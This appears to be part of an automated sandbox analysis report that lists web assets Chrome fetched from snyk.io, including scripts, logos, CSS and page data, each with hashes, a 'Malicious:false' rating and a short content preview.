                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (23897), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):23897
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.309124558333512
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:qiH5aLGGy474znD9oSZXH79WfhaONcgnCXg9:XuGGhaXXY5TcgnCXg9
                                                                                                                                                                                                                                                                                                              MD5:CD29B9BC973E48A7FCD0EE7153BDF03B
                                                                                                                                                                                                                                                                                                              SHA1:AC3E5CF1C0D4183B2DF14C34BEBB84B3EE657799
                                                                                                                                                                                                                                                                                                              SHA-256:7CB58278C8F54A62C0AFA6DA0C67B3A45AAD637A0BF614E9C0DD42B73CEE266B
                                                                                                                                                                                                                                                                                                              SHA-512:253356199738322AE0D761A162136D91BA00018B180FF54C4D014C0B8AE4A93F5DD4D21664E8C582A4DB73F0F4265D34604D2B4C03CEF02A67882815ED328C2D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[52],{jrvE:function(e,t,n){"use strict";var r=n("nfbA"),a=n("cgfC"),i=n("a4gb"),o=n("+nxv"),c=n("usiZ"),s=n("nb4r"),u=n("2nP+"),l=n("AHQf"),d=n("jiYP"),p=n("zgdO"),f=n("bTzN"),v=n("jniC"),_=n("uIJS"),h=n("wQh9"),b=n("yvDu"),m=n("LvsC"),O=n("qytN"),g=n("7jL2"),y=n("LfGp"),j=n("uHEx"),E=n("Iwrg"),k=n("+OSO"),S=n("MiOA"),x=n("8dVd"),w=n("26VM"),T=n("mekd"),R=n("3QMb");function exceptionFromError(e,t){var n=parseStackFrames(e,t),r={type:t&&t.name,value:extractMessage(t)};return n.length&&(r.stacktrace={frames:n}),void 0===r.type&&""===r.value&&(r.value="Unrecoverable error caught"),r}function eventFromError(e,t){return{exception:{values:[exceptionFromError(e,t)]}}}function parseStackFrames(e,t){var n=t.stacktrace||t.stack||"",r=function getPopSize(e){if(e){if("number"===typeof e.framesToPop)return e.framesToPop;if(F.test(e.message))return 1}return 0}(t);try{return e(n,r)}catch(a){}return[]}var F=/Minified React error #\d+;/i;function extr
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12465), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):12465
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.143073751658841
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VPUJSC+IBjai4s9maJb7GKuJt6HHfPcR3WriRcVEvoh2uj5li/spF7uxQ4wsJvUk:Vc49Il/URxTduq0F765UNMrd
                                                                                                                                                                                                                                                                                                              MD5:70D60F116BE0547CD0A4192C213F2CCB
                                                                                                                                                                                                                                                                                                              SHA1:1A517CBEC805E9148CC40A91CD440FCFEBDFC608
                                                                                                                                                                                                                                                                                                              SHA-256:E186DBBF953431129D19D46D52AD1BFBE6232CED1752EFC48EA1F3EC0AB00422
                                                                                                                                                                                                                                                                                                              SHA-512:695DBB34ED677B95677442381DE3585D6D5A728D06E4974316A7977CDAC696F62A03576AA99B4D3EFC3F2E3D3713DABE85B0693A1C3CE924404732520BF9E98B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_vercel/speed-insights/script.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{var e=(e,t)=>()=>(e&&(t=e(e=0)),t),t=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);function n(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var r,i,a,o,u,c,s,l,f,d,v,m,p,h,g,y,T,S,E,b,L,w,C,M,x,k,A,F,I,B,D,P,R,N,q,O,H,V,U,_,j,J,$,z,G,K,Q,W,X,Y,Z,ee,et,en,er,ei,ea,eo,eu,ec,es,el=e(()=>{}),ef=e(()=>{c=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},s=function(e){if("loading"===document.readyState)return"loading";var t=c();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},l=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},f=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var r=e,i=r.id?"#"+r.id:l(r)+(r.classL
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1251
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.43076853772861
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:md7pIgWcbMdRKLmOeQSfmFtHXRWYxRWZgRK+uKF69FxPg6F/ysbVFyIF/IFKe+C+:a7phWzRK4ZcVwYxwTlLxg6FKWrSuCMrT
                                                                                                                                                                                                                                                                                                              MD5:CB731CC5C2BD9F31D6BFEB19F3C8B1FF
                                                                                                                                                                                                                                                                                                              SHA1:16ACA1C951A03EDD875B99BB8D04F01FA19104AF
                                                                                                                                                                                                                                                                                                              SHA-256:5206536707C84BAA892D3C3231B351985EE828CB8B9C0BD8DB42CD3363995FC4
                                                                                                                                                                                                                                                                                                              SHA-512:61A3C5029F6AA6D1EA60711B5BFBE4DF989F8EFB1999919B017C5391A537F5D9245E72184298A8DDA85CFCB92ECACAEA34ADC6C485B04C72AB9CF0AB33B0D976
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                                                                                                                                                              Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: prod r908. */. (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"163"},g=[],m=function(){if(!k){for(;0<e.length;){var f=e.shift();b.MunchkinTracker[f[0]].apply(b.MunchkinTracker,f[1])}k=!0}},n=function(f){var a=c.createElement("script"),b=c.getElementsByTagName("base")[0]||c.getElementsByTagName("script")[0];a.type="text/javascript";a.async=!0;a.src=f;a.onreadystatechange=function(){"complete"!==this.readyState&&"loaded"!==this.readyState||m()};a.onload=m;b.parentNode.insertBefore(a,b)},h={CLICK_LINK:"CLICK_LINK",.VISIT_WEB_PAGE:"visitWebPage",init:function(b){var a;a=l[b];if(!a&&0<g.length){a=b;var c=0,d;if(0!==a.length)for(d=0;d<a.length;d+=1)c+=a.charCodeAt(d);a=g[c%g.length]}a||(a=l.fallback);e.push(["init",arguments]);"150"===a?n("//munchkin-cdn.marketo.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4969
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9877315552362615
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:/koIanLXP6CcjaG3F/YfLsGU6A3PG4V1wmEbVbL40oBk:/knaG6YGU6w+CwdpL4K
                                                                                                                                                                                                                                                                                                              MD5:AD62472EB6F310DEDA5037C2EE5210FD
                                                                                                                                                                                                                                                                                                              SHA1:9B5BF33766C3BAA46F4DEF67147B6234565A3D1E
                                                                                                                                                                                                                                                                                                              SHA-256:37BE50A4275F91AEF2E3E3B5036CFEF42296BF9A6594576E4016793A5AE17887
                                                                                                                                                                                                                                                                                                              SHA-512:C8C00BE32F7F924F889E301C82ABBF043B5578F97186ADC4B5F7C9998AF01EA2F90D12E04ACFD9A225EBEB1C24EA340C88ED0DAA58D94F3776F6F1E87A23FDFA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1685974241/logo-Intercontinental_Exchange.svg
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="58". height="58". viewBox="0 0 15.345833 15.345833". version="1.1". id="svg3304". inkscape:version="0.92.0 r15299". sodipodi:docname="ice.svg">. <defs. id="defs3298">. <clipPath. id="clipPath672". clipPathUnits="userSpaceOnUse">. <path. inkscape:connector-curvature="0". id="path670". d="M 0,0 H 612 V 792 H 0 Z" />. </clipPath>. </defs>. <sodipodi:namedview. id="base". pagecolor="#ffffff". bordercolor="#666666". borderop
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):16873
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8329770466896824
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:TifrWupKf/Mxf1sdadg29S1n2l9FKFnS3ep6leCdahu:zZMxfs4M2XFKwOp6og
                                                                                                                                                                                                                                                                                                              MD5:E3562838877C5E54DC5D6387F1B8A58D
                                                                                                                                                                                                                                                                                                              SHA1:6CB317397EDF10D8044FB865A5CB5CC96FB2AA0A
                                                                                                                                                                                                                                                                                                              SHA-256:6658E5D802B8B9374924258972CC211A05B758D115458D1E74FEC1F8F3EB50CD
                                                                                                                                                                                                                                                                                                              SHA-512:4BCF8A49AAA819F67DC84F354DC5A7E70CFF527FA7575D51087A4ADB89C9EABEE9CA130AA267C1895894AA56AC6C79A80EA569273440163C77314039C8316312
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1702566793/website-customer-logos/logo-snowflake.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="156" height="48" viewBox="0 0 156 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_11225_365)">.<path d="M108.27 21.5787L108.151 21.4375V21.5787H108.27ZM108.151 20.167L108.27 20.0427H108.151V20.167ZM96.0834 25.6545L96.0411 25.7604L96.1046 25.9213L96.1709 25.7604L96.1244 25.6474H96.0848L96.0834 25.6545ZM109.58 21.5646V21.4234L109.461 21.5646H109.58ZM109.58 20.1811V20.0568H109.461L109.58 20.1811ZM92.6994 30.7975L92.7347 30.799L92.7672 30.7185L92.7813 30.6761L92.7206 30.5067L92.6528 30.6761L92.6994 30.7975ZM99.5041 30.7975L99.538 30.7961L99.5465 30.775L99.5832 30.6705L99.5126 30.5011L99.4533 30.6705L99.5041 30.7975ZM137.459 26.0399L137.389 25.951L137.38 26.1204L137.459 26.0399ZM134.049 29.5721V29.5058L134.013 29.5947L134.049 29.5721ZM136.347 27.0126L136.338 27.0211L136.416 27.1171L136.501 27.0281L136.494 27.0197L136.347 27.0126ZM133.929 27.6705H133.965L134.05 27.5858V27.4121L133.93 27.5335L133.929 27.6705ZM108.27 21.5646V21.4234H108.151L108.27 21.56
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7923
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.953929749309101
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:8UoSzWOo79yB5tPiHZo2FViWbweqAAoIvhITmqxa3P:ZzPB5tK5iSovhI6qa3P
                                                                                                                                                                                                                                                                                                              MD5:9B3D58C8FBDFF17FACE4A4AAB6FA7E16
                                                                                                                                                                                                                                                                                                              SHA1:75FE55B66CE089653E7533D030CBEF877D326746
                                                                                                                                                                                                                                                                                                              SHA-256:A60F2DFFC8411785354AD9CE18C598015B31882D022D72EEFDEE082B7E859AB3
                                                                                                                                                                                                                                                                                                              SHA-512:0F8456EA834706238AEADA7854010405BAAC4E8B297DD896E20029D45FBA510871434F3F1861DC154CB6CC4951DEB355D1C3E17F03430F6572FF3507C538EB05
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...`...`......F......PLTE........~..}........s.....|.....l.....n.....y..v..........x..t.Ui..}..h.Pc.....m..g..c........x....s..k..}..~.k...j!Zn......{a.....r....x[....d....x.^..rV.....r..J]..^.nSiYC$...........h..|]..c....|....X}.b.......y...i......}hO.v^s_G.BS.yh.Nn.uV....z.Su.Ie...Q]V.<R.C]rX:.........3B...ZJ2bR<......[g`............~.~.{..s|t&aw.. ...?KC...r.......jun.s.aoi.......(4..`..ofM,|o]...6?69..04).Xv..........w..#+"..keVPA*..t....FTN..[{.)j.K..\.....4.....Pjl.eAr...x_}....`.....1Yd.v9{.q..R..+GL.fCwn.]....pHYs.................IDATx.]Y.W.Y.}..ju.[9g...( @HX.A.A..&...h..`Lr.q.y....{.....:(...U.V...DJ%..I.-.R..B{.I...M..M.d.f..RI.M".&I......JJJJ..I]..J.Dp..../........pz.Z.JJ$:...fL).H:u..S6.I*H.Ft*.h..H..MA"..DB4-I..DB....j5..4Kv%........{......D.h..L&...O=o.8.I.Lt.4!.$.6.....I.."y....,....j5.....B.'.L.....nhh`.....6......I...0..4-c..)L$p#!RA.@.B......#N..Hj5.R]..V..x..U`z... .{4...H....m2..)L..D.HA.L...%....{..$H...B.......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):184787
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.091039649170436
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:f/m2fWmIh/eda5e7oW7lN4IIAQaznRN/rSMx5CjAAJElXt2:fu2fWvmWonCrJAXt2
                                                                                                                                                                                                                                                                                                              MD5:E1E48F2B6CF34F83DC3F4DF1F8C378C3
                                                                                                                                                                                                                                                                                                              SHA1:B575EC293E44A7646FA028A9518819AC4CF1C232
                                                                                                                                                                                                                                                                                                              SHA-256:AA019975C6868B97E1F44E8537BFEB55D36A08294B5D7D9E3F98794644C9CEE7
                                                                                                                                                                                                                                                                                                              SHA-512:476BFB981B60B35F60A344BB65BFDA529F84D1D308E502E619E0F577796F23AC51F2BF468DAD6A899F28674B70DB6B947754E1CC1A3F8AE1A97911D7C39C5483
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"ckamtMcnDFiLPyIUsZ4hR","type":"Entry","createdAt":"2022-10-21T23:54:27.402Z","updatedAt":"2024-07-16T13:34:48.252Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":9,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"About Snyk - Careers","title":"Careers | Snyk","slug":"careers","uri":"careers","pageLocalization":["de","ja","fr"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"8uY8AETxksKZEnvgTFYXH","type":"Entry","createdAt":"2022-10-21T23:54:27.508Z","updatedAt":"2024-02-29T17:27:23.522Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":22,"revision":9,"contentType":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3457), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3457
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.321197055302141
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:BmG2yNFe2+TwaIQNeJgoXwG7sNIDimeh8x5V54VDETTYsCx5sVsDZnb7Wfqv8RlF:wRnrGThYssuRqeRf
                                                                                                                                                                                                                                                                                                              MD5:95387D564959024662FEA5D5784DAC6A
                                                                                                                                                                                                                                                                                                              SHA1:9DE12E9F7305360E4CF4EE6DF04CD85524158D40
                                                                                                                                                                                                                                                                                                              SHA-256:747C8004FD9EE52350910E338CA3E125EF4DA8416B16B14062778674A3C36374
                                                                                                                                                                                                                                                                                                              SHA-512:95D80AEBE3AB61194273DA80D04D561D13ABD823A6056EDD2D81B903AD38F2FBD62CDF5275A51E7EA86D0671F38E2FE0C1A9A7BEB43DC0BBFC6327F914D35F8C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://ws.zoominfo.com/pixel/648751cc35d6eb864afa5399/?iszitag=true
                                                                                                                                                                                                                                                                                                              Preview:if(!window?.ZILogs) { window.ZILogs = { ws: {} } } (function(ctx){!function({eventId:c,websiteId:l,companyId:S,newSessionId:m,serviceUrl:u,durationsVersionKey:g,ziwsKey:I="ziws",disableUnloadEvent:f,requestFromZITag:p=!1,unifiedScriptVerified:y=!1,createdAt:b,visitorId:z,minSessionTimeSecs:L,maxSessionTimeSecs:_}){window["_zi"+I]={...window["_zi"+I]},window[I]={...window[I],fn:null},window[I].fn=function(){var i,n,t,e,s,o,d;function a(e,i){var n=new XMLHttpRequest,t=sessionStorage.getItem("unifiedScriptVerified");n.open("POST",e),n.setRequestHeader("Content-type","application/json; charset=UTF-8"),n.setRequestHeader("x-ws-collect-type","xhr"),n.setRequestHeader("requestFromZITag",p),n.setRequestHeader("unifiedScriptVerified",t),n.send(i)}function w(){sessionStorage.getItem("unifiedScriptVerified")&&!p||(window[I].secs+=window[I].intrvlGap,v(),r())}function r(){var e;window[I].secs==n&&window[I].secs<=_&&((e=sessionStorage.getItem(I+"Session"))&&a(t,e),[i,n]=[n,n+i])}function v(){sessio
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4822), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4822
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.012188887751148
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:rLSJ1D1yO4MAdunITe1/m+vb5ejAlJsJk1TRBX:yfczdunD/ba+su1b
                                                                                                                                                                                                                                                                                                              MD5:BC1072F0BC0A6F99055052157E07511F
                                                                                                                                                                                                                                                                                                              SHA1:33B911F0C83EBA7D4DFD1802439550E993847143
                                                                                                                                                                                                                                                                                                              SHA-256:37B82815D46552A83D5E3BA5DCAC583D20B498450439EB9CCF40946DD72044BB
                                                                                                                                                                                                                                                                                                              SHA-512:3AEADA1032385CFF72B24B31776A0299A3274EEE41B02A9191ED62FAC5920A02FA641F5BB3946123703097347DA98BB3584AB479FB7498ABC57DFDB78AFD9130
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6936],{16936:function(l,i,d){d.r(i);var o=d(85893),v=d(88015),n=d(96620),e=d(23751),u=d(74129),a=d(86943),s=d(6215),t=d(86437);let r=l=>({...a.Z,renderNode:{...a.Z.renderNode,[t.BLOCKS.EMBEDDED_ENTRY]:i=>{var d,v,e,u,a,t,r,c,f,m,p,h,b,I,y,g,k;if((null==i?void 0:null===(a=i.data)||void 0===a?void 0:null===(u=a.target)||void 0===u?void 0:null===(e=u.sys)||void 0===e?void 0:null===(v=e.contentType)||void 0===v?void 0:null===(d=v.sys)||void 0===d?void 0:d.id)==="moleculeListItem")return(0,o.jsx)(n.Z,{icon:null==i?void 0:null===(m=i.data)||void 0===m?void 0:null===(f=m.target)||void 0===f?void 0:null===(c=f.fields)||void 0===c?void 0:null===(r=c.appearance)||void 0===r?void 0:null===(t=r.listItem)||void 0===t?void 0:t.icon,label:null==i?void 0:null===(b=i.data)||void 0===b?void 0:null===(h=b.target)||void 0===h?void 0:null===(p=h.fields)||void 0===p?void 0:p.label,url:null==i?void 0:null===(g=i.data)||void 0===g?void 0:nu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13978
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9813214370964976
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Hmp4xTpemXgcNQOkFiYqNGVApKvWz+jG3:GevvkFiPgOb
                                                                                                                                                                                                                                                                                                              MD5:533DF27E519A93DF08D8C41E6EEA0211
                                                                                                                                                                                                                                                                                                              SHA1:43657736B3A7C4450184D35F8F69502DFFD7D057
                                                                                                                                                                                                                                                                                                              SHA-256:0150B39B976BB6AE71D2CD2E0280B7F8854DED02CF37C0A2C06A4155923597A0
                                                                                                                                                                                                                                                                                                              SHA-512:E575C3570DCD56DE463C47DD288F1E6964069D64CB646144E36ACA063A632BC8BB757AC51D9A46779A2DC705E2A7B58833BDE9364FD2B7DE0D3D63A4D18BB44A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1677605991/website-customer-logos/logo-salesforce.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="69" height="48" viewBox="0 0 69 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1_101)">.<path d="M28.5392 5.22846C29.6592 4.0496 31.0077 3.11129 32.5024 2.47073C33.997 1.83017 35.6065 1.50079 37.2326 1.50272C39.3962 1.50507 41.5196 2.0883 43.3808 3.19152C45.2421 4.29473 46.773 5.87748 47.8137 7.77441C49.6947 6.9427 51.7307 6.51941 53.7873 6.5325C57.7398 6.5325 61.5304 8.10262 64.3253 10.8975C67.1201 13.6923 68.6903 17.483 68.6903 21.4355C68.6903 25.388 67.1201 29.1786 64.3253 31.9734C61.5304 34.7683 57.7398 36.3384 53.7873 36.3384C52.811 36.3383 51.8372 36.2384 50.8812 36.0404C49.5287 38.4503 47.3079 40.2536 44.6716 41.0825C42.0402 41.915 39.1891 41.7016 36.711 40.4864C35.7452 42.7621 34.1178 44.695 32.0399 46.0343C29.962 47.3736 27.5296 48.0576 25.0582 47.9973C22.5868 47.9371 20.1906 47.1354 18.1804 45.6965C16.1702 44.2575 14.6389 42.2476 13.7852 39.9276C13.0145 40.0973 12.2272 40.1807 11.438 40.176C8.38682 40.1595 5.46698 38.9325 3.31995 36.7
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13465), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13465
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.338829247140058
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:252M+F5E65RT8ITLhF4KRSgfBk3qkXZEd5NhHdzkHoh9X5GYjmt:252M+F22TXLr4Hp3nXZ88Hw9pmt
                                                                                                                                                                                                                                                                                                              MD5:59370E3451C4718A1194E07E3F4F3947
                                                                                                                                                                                                                                                                                                              SHA1:6AC814317E16F3D2F06DEF2533B053822DD2203F
                                                                                                                                                                                                                                                                                                              SHA-256:F9FCF0CEA9F4EE2AFE5A319C0E03CD66CD3A377FCB2F3CE36D3BFA011C66F112
                                                                                                                                                                                                                                                                                                              SHA-512:B6BB8232F8B704ECD08D9C515B21940E71FF5DBBBF326D60C7DBEEE0C3278EEAD2637EA8666197CE5E7281AC7D4ADBC0E0BDEE78B795764F0245C9344C91E040
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2165],{8241:function(i,l,o){o.d(l,{d:function(){return n},x:function(){return e}});let e=function(i){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,o=1;switch(!0){case i>0&&i<l:o=i;break;case i>=l:o=l;break;case l>=12:o=12}return o},n=i=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case i<=2:l.hasMaxWidth=!0;break;case 4===i:l.itemPadding="medium",l.gap="medium";break;case i>4:l.itemPadding="medium",l.gap="small"}return l}},73359:function(i,l,o){o.d(l,{Z:function(){return r}});var e=o(85893),n=o(45697),d=o.n(n),a=o(44133);function t(i){let{label:l,className:o}=i;return(0,e.jsx)("span",{className:(0,a.Z)("badge",o),"data-component":"Badge",children:l})}t.propTypes={label:d().string,type:d().string,className:d().string};var r=t},90913:function(i,l,o){var e=o(85893),n=o(45697),d=o.n(n),a=o(44133),t=o(15020),r=o(9981),s=o(23751);function u(i){let{gradient:l,position:o="to
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):826
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.713751963688756
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:cYJwH894+LaNyj94+LaNy1CJHv/0c4Doz0Nr0EUpY:rJwgDfCJX2D0CUpY
                                                                                                                                                                                                                                                                                                              MD5:2B284FDD03DFA5CC9998DEC2320C6626
                                                                                                                                                                                                                                                                                                              SHA1:7066B6CFC1DB11CA2A58BCD1D91A77EA4AEDDA98
                                                                                                                                                                                                                                                                                                              SHA-256:14C8C62DC692FD8FAA04434E3FED25E7C23D596B732F9DB88F6E9F9FF5DFA61C
                                                                                                                                                                                                                                                                                                              SHA-512:BA8A97E95A40B984DF9F57ABEBBAFC6B9706FC156A603E6D94005BB2F09D3E7BA513E2194C0EF0AE767A56752EBB4E431CADB37A7B31A4F8AE63FE82731CE4B8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/js/forms2/css/forms2-theme-simple.css
                                                                                                                                                                                                                                                                                                              Preview:#mktoStyleLoaded {. /* css load detection, do not remove */. color:#123456;.}..mktoForm fieldset {}..mktoForm fieldset legend{}..mktoForm input[type=text],..mktoForm input[type=url],..mktoForm input[type=email],..mktoForm input[type=tel],..mktoForm input[type=number],..mktoForm input[type=date]{}...mktoForm input[type=text],..mktoForm input[type=url],..mktoForm input[type=email],..mktoForm input[type=tel],..mktoForm input[type=number],..mktoForm input[type=date],..mktoForm textarea.mktoField,..mktoForm select.mktoField {. padding:2px 3px;.}...mktoForm input[type=text]:focus,..mktoForm input[type=url]:focus,..mktoForm input[type=email]:focus,..mktoForm input[type=tel]:focus,..mktoForm input[type=number]:focus,..mktoForm input[type=date]:focus,..mktoForm select.mktoField:focus,..mktoForm textarea.mktoField:focus{}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13
